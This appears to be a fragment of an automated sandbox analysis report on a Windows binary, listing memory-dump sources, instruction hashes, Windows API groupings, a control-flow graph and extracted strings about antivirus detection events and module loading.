                                            • Instruction ID: d0b300e719b5d8750f6b1ae6f89fa2e10ec81cdb993b21d71de82238eb0c47fc
                                            • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                            • Instruction Fuzzy Hash: 61B14EB7604B898BE716CF39C88936C77A0F784B48F188961DADD977A8CB39D451C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 203985260-0
                                            • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                            • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                            • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                            • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                            • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                            • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                            • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                            • Instruction ID: 55463b919ea3a52b6a977644f00d31b98771744184d6bf951d94a701353682fb
                                            • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                            • Instruction Fuzzy Hash: CE51F4A6B086C185FB21DF72EC881AE7BA4BB45B94F184574EE9D37A99CE3CD001C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: EntryFunctionLookup
                                            • String ID:
                                            • API String ID: 3852435196-0
                                            • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                            • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                            • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                            • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                            • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                            • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                            • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: InfoLocale
                                            • String ID:
                                            • API String ID: 2299586839-0
                                            • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                            • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                            • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                            • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                            • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                            • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                            • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                            • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                            • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                            • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                            • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                            • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                            • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                            • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                            • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                            • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                            • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                            • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                            • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -
                                            • API String ID: 0-2547889144
                                            • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                            • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                            • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                            • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                            • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                            • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                            • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                            • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                            • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                            • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                            • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                            • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                            • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                            • Instruction ID: 670e97a142c2f09490d67568de8b43bbf816610a3980219fbe0e7b0476ffcd07
                                            • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                            • Instruction Fuzzy Hash: 28F062B9B192958AEBA58F38E846B2D77D0E748380F988079D6CD83B14D67C90608F04

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                            • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                            • API String ID: 1021822269-3147033232
                                            • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                            • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                            • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                            • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                            • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                            • API String ID: 883923345-381368982
                                            • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                            • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                            • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                            • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                            • String ID:
                                            • API String ID: 1613947383-0
                                            • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                            • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                            • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                            • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                            • String ID:
                                            • API String ID: 1995290849-0
                                            • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                            • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                            • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                            • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
